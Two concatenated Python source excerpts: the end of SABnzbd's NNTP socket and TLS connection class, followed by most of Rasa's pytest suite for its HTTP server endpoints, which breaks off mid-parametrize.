self.error_msg: Optional[str] = None
if not self.nw.server.info:
raise socket.error(errno.EADDRNOTAVAIL, "Address not available - Check for internet or DNS problems")
af, socktype, proto, canonname, sa = self.nw.server.info[0]
# there will be a connect to host (or self.host, so let's force set 'af' to the correct value
if is_ipv4_addr(self.host):
af = socket.AF_INET
if is_ipv6_addr(self.host):
af = socket.AF_INET6
# Secured or unsecured?
if not self.nw.server.ssl:
# Basic connection
self.sock = socket.socket(af, socktype, proto)
else:
# Use context or just wrapper
if sabnzbd.CERTIFICATE_VALIDATION:
# Setup the SSL socket
ctx = ssl.create_default_context()
if not sabnzbd.cfg.allow_old_ssl_tls():
# We want a modern TLS (1.2 or higher), so we disallow older protocol versions (<= TLS 1.1)
ctx.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
# Only verify hostname when we're strict
if self.nw.server.ssl_verify < 2:
ctx.check_hostname = False
# Certificates optional
if self.nw.server.ssl_verify == 0:
ctx.verify_mode = ssl.CERT_NONE
# Did the user set a custom cipher-string?
if self.nw.server.ssl_ciphers:
# At their own risk, socket will error out in case it was invalid
ctx.set_ciphers(self.nw.server.ssl_ciphers)
self.sock = ctx.wrap_socket(socket.socket(af, socktype, proto), server_hostname=self.nw.server.host)
else:
# Use a regular wrapper, no certificate validation
self.sock = ssl.wrap_socket(socket.socket(af, socktype, proto))
# Store fileno of the socket
self.fileno: int = self.sock.fileno()
# Open the connection in a separate thread due to avoid blocking
# For server-testing we do want blocking
if not self.nw.blocking:
Thread(target=self.connect).start()
else:
self.connect()
def connect(self):
"""Start of connection, can be performed a-sync"""
try:
# Wait only 15 seconds during server test
if self.nw.blocking:
self.sock.settimeout(15)
# Connect
self.sock.connect((self.host, self.nw.server.port))
self.sock.setblocking(self.nw.blocking)
# Log SSL/TLS info
if self.nw.server.ssl:
logging.info(
"%s@%s: Connected using %s (%s)",
self.nw.thrdnum,
self.nw.server.host,
self.sock.version(),
self.sock.cipher()[0],
)
self.nw.server.ssl_info = "%s (%s)" % (self.sock.version(), self.sock.cipher()[0])
# Now it's safe to add the socket to the list of active sockets
# Skip this step during server test
if not self.nw.blocking:
sabnzbd.Downloader.add_socket(self.fileno, self.nw)
except OSError as e:
self.error(e)
def error(self, error: OSError):
raw_error_str = str(error)
if "SSL23_GET_SERVER_HELLO" in str(error) or "SSL3_GET_RECORD" in raw_error_str:
error = T("This server does not allow SSL on this port")
# Catch certificate errors
if type(error) == ssl.CertificateError or "CERTIFICATE_VERIFY_FAILED" in raw_error_str:
# Log the raw message for debug purposes
logging.info("Certificate error for host %s: %s", self.nw.server.host, raw_error_str)
# Try to see if we should catch this message and provide better text
if "hostname" in raw_error_str:
raw_error_str = T(
"Certificate hostname mismatch: the server hostname is not listed in the certificate. This is a server issue."
)
elif "certificate verify failed" in raw_error_str:
raw_error_str = T("Certificate not valid. This is most probably a server issue.")
# Reformat error and overwrite str-representation
error_str = T("Server %s uses an untrusted certificate [%s]") % (self.nw.server.host, raw_error_str)
error_str = "%s - %s: %s" % (error_str, T("Wiki"), "https://sabnzbd.org/certificate-errors")
error.strerror = error_str
# Prevent throwing a lot of errors or when testing server
if error_str not in self.nw.server.warning and not self.nw.blocking:
logging.error(error_str)
# Pass to server-test
if self.nw.blocking:
raise error
# Blocking = server-test, pass directly to display code
if self.nw.blocking:
raise socket.error(errno.ECONNREFUSED, str(error))
else:
msg = "Failed to connect: %s" % (str(error))
msg = "%s %s@%s:%s" % (msg, self.nw.thrdnum, self.host, self.nw.server.port)
self.error_msg = msg
self.nw.server.next_busy_threads_check = 0
logging.info(msg)
self.nw.server.warning = msg
def __repr__(self):
return "<NNTP: %s:%s>" % (self.host, self.nw.server.port)
|
test_server.py
|
import os
from multiprocessing.managers import DictProxy
from unittest.mock import Mock, ANY
import requests
import time
import tempfile
import uuid
from typing import List, Text, Type, Generator, NoReturn, Dict
from contextlib import ExitStack
from _pytest import pathlib
from aioresponses import aioresponses
import pytest
from freezegun import freeze_time
from mock import MagicMock
from multiprocessing import Process, Manager
import rasa
import rasa.constants
import rasa.utils.io
import rasa.server
from rasa.core import events, utils
from rasa.core.agent import Agent
from rasa.core.channels import CollectingOutputChannel, RestInput, SlackInput
from rasa.core.channels.slack import SlackBot
from rasa.core.events import Event, UserUttered, SlotSet, BotUttered
from rasa.core.trackers import DialogueStateTracker
from rasa.model import unpack_model
from rasa.nlu.constants import INTENT_NAME_KEY
from rasa.utils.endpoints import EndpointConfig
from rasa import utils as rasa_utils
from sanic import Sanic
from sanic.testing import SanicTestClient
from tests.nlu.utilities import ResponseTest
from tests.conftest import get_test_client
from ruamel.yaml import StringIO
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_without_api)
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_server)
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_nlu_server)
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_core_server)
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_secured)
def test_root(rasa_app: SanicTestClient):
_, response = rasa_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_without_enable_api(rasa_app_without_api: SanicTestClient):
_, response = rasa_app_without_api.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_version(rasa_app: SanicTestClient):
_, response = rasa_app.get("/version")
content = response.json
assert response.status == 200
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
def test_status(rasa_app: SanicTestClient, trained_rasa_model: Text):
_, response = rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
def test_status_nlu_only(rasa_app_nlu: SanicTestClient, trained_nlu_model: Text):
_, response = rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == trained_nlu_model
def test_status_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/status")
assert response.status == 401
def test_status_not_ready_agent(rasa_app: SanicTestClient):
rasa_app.app.agent = None
_, response = rasa_app.get("/status")
assert response.status == 409
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
from pathlib import Path
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
def mocked_training_function(*_, **__) -> Text:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return fake_model_path
def run_server() -> NoReturn:
import rasa
rasa.train = mocked_training_function
from rasa import __main__
import sys
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server)
yield server
server.terminate()
@pytest.fixture()
def training_request(shared_statuses: DictProxy) -> Generator[Process, None, None]:
def send_request() -> None:
with ExitStack() as stack:
formbot_data = dict(
domain="examples/formbot/domain.yml",
config="examples/formbot/config.yml",
stories="examples/formbot/data/stories.md",
nlu="examples/formbot/data/nlu.md",
)
payload = {
key: stack.enter_context(open(path)).read()
for key, path in formbot_data.items()
}
response = requests.post(
"http://localhost:5005/model/train",
json=payload,
params={"force_training": True},
)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# Due to unknown reasons this test can not be run in pycharm, it
# results in segfaults...will skip in that case - test will still get run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return requests.get("http://localhost:5005/status").status_code == 200
except Exception:
return False
# wait until server is up before sending train request and status test loop
while not is_server_ready():
time.sleep(1)
training_request.start()
# Wait until the blocking training function was called
while shared_statuses.get("started_training") is not True:
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
while shared_statuses.get("training_result") is None:
time.sleep(1)
# Check that the training worked correctly
assert shared_statuses["training_result"] == 200
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse(rasa_app: SanicTestClient, response_test: ResponseTest):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
rjs = response.json
assert response.status == 200
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse_with_different_emulation_mode(
rasa_app: SanicTestClient, response_test: ResponseTest
):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
assert response.status == 200
def test_parse_without_nlu_model(rasa_app_core: SanicTestClient):
_, response = rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == 200
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicTestClient):
_, response = rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == 400
def test_train_stack_success(
rasa_app: SanicTestClient,
default_domain_path: Text,
default_stories_file: Text,
default_stack_config: Text,
default_nlu_data: Text,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
stories_file = stack.enter_context(open(default_stories_file))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=stories_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert response.headers["filename"] is not None
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_nlu_success(
rasa_app: SanicTestClient,
default_stack_config: Text,
default_nlu_data: Text,
default_domain_path: Text,
):
domain_data = rasa_utils.io.read_yaml_file(default_domain_path)
config_data = rasa_utils.io.read_yaml_file(default_stack_config)
nlu_data = rasa_utils.io.read_yaml_file(default_nlu_data)
# combine all data into our payload
payload = {
key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
}
data = StringIO()
rasa_utils.io.write_yaml(payload, data)
_, response = rasa_app.post(
"/model/train",
data=data.getvalue(),
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_core_success(
rasa_app: SanicTestClient,
default_stack_config: Text,
default_stories_file: Text,
default_domain_path: Text,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(open(default_stories_file))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_with_retrieval_events_success(
rasa_app: SanicTestClient, default_stack_config: Text
):
with ExitStack() as stack:
domain_file = stack.enter_context(
open("data/test_domains/default_retrieval_intents.yml")
)
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(
open("data/test_stories/stories_retrieval_intents.md")
)
responses_file = stack.enter_context(open("data/test_responses/default.md"))
nlu_file = stack.enter_context(
open("data/test_nlu/default_retrieval_intents.md")
)
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
responses=responses_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert_trained_model(response.body)
def assert_trained_model(response_body: bytes) -> None:
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response_body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.parametrize(
"payload",
[
{"config": None, "stories": None, "nlu": None, "domain": None, "force": True},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"force": False,
"save_to_default_model_directory": True,
},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"save_to_default_model_directory": False,
},
],
)
def test_deprecation_warnings_json_payload(payload: Dict):
with pytest.warns(FutureWarning):
rasa.server._validate_json_training_payload(payload)
def test_train_with_yaml(rasa_app: SanicTestClient):
training_data = """
stories:
- story: My story
steps:
- intent: greet
- action: utter_greet
rules:
- story: My rule
steps:
- intent: greet
- action: utter_greet
intents:
- greet
nlu:
- intent: greet
examples: |
- hi
- hello
responses:
utter_greet:
- text: Hi
language: en
polices:
- name: RulePolicy
pipeline:
- name: WhitespaceTokenizer
- name: CountVectorsFeaturizer
- name: DucklingHTTPExtractor
- name: DIETClassifier
epochs: 1
"""
_, response = rasa_app.post(
"/model/train",
data=training_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert_trained_model(response.body)
def test_train_with_invalid_yaml(rasa_app: SanicTestClient):
invalid_yaml = """
rules:
rule my rule
"""
_, response = rasa_app.post(
"/model/train",
data=invalid_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 400
@pytest.mark.parametrize(
"headers, expected",
[({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(headers: Dict, expected: bool):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request)
assert payload.get("force_training") == expected
@pytest.mark.parametrize(
"headers, expected",
[
({}, rasa.constants.DEFAULT_MODELS_PATH),
({"save_to_default_model_directory": False}, ANY),
({"save_to_default_model_directory": True}, rasa.constants.DEFAULT_MODELS_PATH),
],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
headers: Dict, expected: Text
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request)
assert payload.get("output")
assert payload.get("output") == expected
def test_train_missing_config(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config=None)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_missing_training_data(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_internal_error(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 500
def test_evaluate_stories(rasa_app: SanicTestClient, default_stories_file: Text):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app.post("/model/test/stories", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicTestClient, default_stories_file: Text
):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == 409
def test_evaluate_stories_end_to_end(
rasa_app: SanicTestClient, end_to_end_story_file: Text
):
stories = rasa.utils.io.read_file(end_to_end_story_file)
_, response = rasa_app.post("/model/test/stories?e2e=true", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_intent(rasa_app: SanicTestClient, default_nlu_data: Text):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicTestClient, default_nlu_data: Text
):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app_nlu.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_with_query_param(
rasa_app: SanicTestClient, trained_nlu_model, default_nlu_data: Text
):
_, response = rasa_app.get("/status")
previous_model_file = response.json["model_file"]
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = rasa_app.get("/status")
assert previous_model_file == response.json["model_file"]
def test_predict(rasa_app: SanicTestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
}
}
_, response = rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == 200
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(rasa_app: SanicTestClient):
_, response = rasa_app.get("/conversations/madeupid/tracker")
content = response.json
assert response.status == 200
assert content["paused"] is False
assert content["slots"] == {"name": None}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
INTENT_NAME_KEY: "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
def test_pushing_event(rasa_app: SanicTestClient, event: Event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
assert len(tracker.get("events")) == 1
evt = tracker.get("events")[0]
deserialised_event = Event.from_parameters(evt)
assert deserialised_event == event
assert deserialised_event.timestamp > time_before_adding_events
def test_push_multiple_events(rasa_app: SanicTestClient):
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{conversation_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
# there is also an `ACTION_LISTEN` event at the start
assert tracker.get("events") == events
def test_put_tracker(rasa_app: SanicTestClient):
data = [event.as_dict() for event in test_events]
_, response = rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == 200
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
def test_sorted_predict(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
def _create_tracker_for_sender(app: SanicTestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == 200
def test_get_tracker_with_jwt(rasa_secured_app: SanicTestClient):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 200
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 403
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
def test_list_routes(default_agent: Agent):
from rasa import server
app = server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
def test_unload_model_error(rasa_app: SanicTestClient):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "model_file" in response.json and response.json["model_file"] is not None
_, response = rasa_app.delete("/model")
assert response.status == 204
def test_get_domain(rasa_app: SanicTestClient):
_, response = rasa_app.get(
"/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
)
content = response.json
assert response.status == 200
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
def test_get_domain_invalid_accept_header(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain")
assert response.status == 406
def test_load_model(rasa_app: SanicTestClient, trained_core_model: Text):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
data = {"model_file": trained_core_model}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
def test_load_model_from_model_server(
rasa_app: SanicTestClient, trained_core_model: Text
):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
import rasa.core.jobs
rasa.core.jobs.__scheduler = None
def test_load_model_invalid_request_body(rasa_app: SanicTestClient):
_, response = rasa_app.put("/model")
assert response.status == 400
def test_load_model_invalid_configuration(rasa_app: SanicTestClient):
data = {"model_file": "some-random-path"}
_, response = rasa_app.put("/model", json=data)
assert response.status == 400
def test_execute(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "test_execute")
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_execute_with_missing_action_name(rasa_app: SanicTestClient):
test_sender = "test_execute_with_missing_action_name"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 400
def test_execute_with_not_existing_action(rasa_app: SanicTestClient):
test_sender = "test_execute_with_not_existing_action"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 500
def test_trigger_intent(rasa_app: SanicTestClient):
data = {INTENT_NAME_KEY: "greet"}
_, response = rasa_app.post("/conversations/test_trigger/trigger_intent", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_trigger_intent_with_missing_intent_name(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 400
def test_trigger_intent_with_not_existing_intent(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
_create_tracker_for_sender(rasa_app, test_sender)
data = {INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 404
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
([RestInput(), SlackInput("test")], "slack", SlackBot),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
